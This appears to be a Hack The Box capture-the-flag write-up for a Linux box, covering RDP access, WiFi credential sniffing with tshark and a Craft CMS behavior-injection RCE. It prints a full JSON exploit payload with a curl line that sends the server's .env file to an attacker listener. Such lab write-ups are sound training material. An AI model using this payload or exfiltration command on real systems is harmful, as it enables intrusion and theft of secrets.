Hack The Box - HTB Layover Writeup - Medium- Weekly - September 26th, 2026
Machine Name: Layover Operating System: Linux Difficulty: Medium
Executive Summary
Layover is a medium-rated Linux box themed around a corporate airport network. The path to compromise opens with an RDP session against a loosely secured jumpbox, then moves through a simulated virtual WiFi segment where plaintext credentials can be sniffed off the wire. Those credentials unlock a Remote Code Execution (RCE) flaw in Craft CMS, which in turn enables lateral movement over SSH. Root is reached by abusing a local privilege escalation bug in the CUPS printing service.
1. Initial Access & Enumeration
1.1 Port Scanning and RDP Access
A first pass with Rustscan and Nmap surfaces two listening ports:
- 22/tcp: OpenSSH
- 3389/tcp: RDP (xrdp)
The box ships with starter credentials (contractor / Contractor2026!). Password-based SSH is turned off for this account, but the same credentials authenticate cleanly over RDP. The session drops us into an XFCE desktop running on a jumpbox named airside-ws01.
1.2 Virtual WiFi Enumeration
Poking around the jumpbox locally turns up virtual WiFi adapters (wlan2, wlan3) backed by the mac80211_hwsim kernel module, which fakes WiFi hardware for lab scenarios.
A scan for nearby networks shows an open SSID, HTB International WiFi. Associating with it hands us an address on the internal 10.13.37.0/24 subnet.
1.3 Traffic Sniffing (tshark)
To grab credentials for the internal portal, wlan3 is switched into monitor mode on channel 6. tshark then filters for HTTP POST requests, capturing login attempts sent in the clear across the unencrypted WiFi:
tshark -i wlan3 -Y 'http.request.method=="POST"' -T fields -e ip.src -e http.request.full_uri -e urlencoded-form.key -e urlencoded-form.value
Before long, a scripted "employee" authenticates to the portal, exposing:
- Username:
jenny - Password:
Fl1ghtDeck2026!
2. Foothold: Craft CMS RCE
2.1 Vulnerability Identification (SAST & ALPN Analysis)
Working through the internal portal (portal.international.htb), we apply SAST (Static Application Security Testing) reasoning to how the application responds and inspect the ALPN (Application-Layer Protocol Negotiation) headers to fingerprint the stack. This pins the portal to Craft CMS 5.9.8, sitting on the Yii2 PHP framework.
Digging into that release reveals a serious Behavior Injection vulnerability (tied to CVEs affecting Craft CMS < 5.9.9). The /admin/actions/element-search/search endpoint doesn't properly validate the fieldLayouts parameter inside the JSON body, which lets us instantiate arbitrary PHP classes.
2.2 Exploitation
We leverage the flaw to make the server load the Psy\Readline\Hoa\ConsoleProcessus class, whose execute method can run system commands.
Delivering a purpose-built JSON payload — either through the browser console or a short Python script — gives us Remote Code Execution. Because command output never comes back in the HTTP response, we pull data out of band: the server is instructed to curl a base64-encoded copy of the .env file to a listener on the jumpbox.
Payload Structure:
{
"elementType": "craft\\elements\\Category",
"siteId": 1,
"search": "",
"condition": {
"class": "craft\\elements\\conditions\\ElementCondition",
"elementType": "craft\\elements\\Category",
"fieldLayouts": [{
"as rce": {
"__class": "yii\\behaviors\\AttributeTypecastBehavior",
"__construct()": [{
"attributeTypes": {
"typecastBeforeSave": [
"Psy\\Readline\\Hoa\\ConsoleProcessus",
"execute"
]
},
"typecastBeforeSave": ["sh", "-c", "curl http://<ATTACKER_IP>:9999/$(cat /var/www/portal/.env | base64 -w0)"]
}]
},
"on *": "self::beforeSave"
}]
}
}
2.3 Decrypting Credentials
Decoding the exfiltrated base64 blob hands us the CRAFT_SECURITY_KEY stored in .env.
Signed in as Jenny, we export a SQL backup of the database from the Craft CMS admin panel. The htbairways_settings table holds an encrypted password belonging to aporter. Feeding the stolen CRAFT_SECURITY_KEY into a small PHP script on the target lets us decrypt it:
- Username:
aporter - Password:
Skyp0rt_Relay!26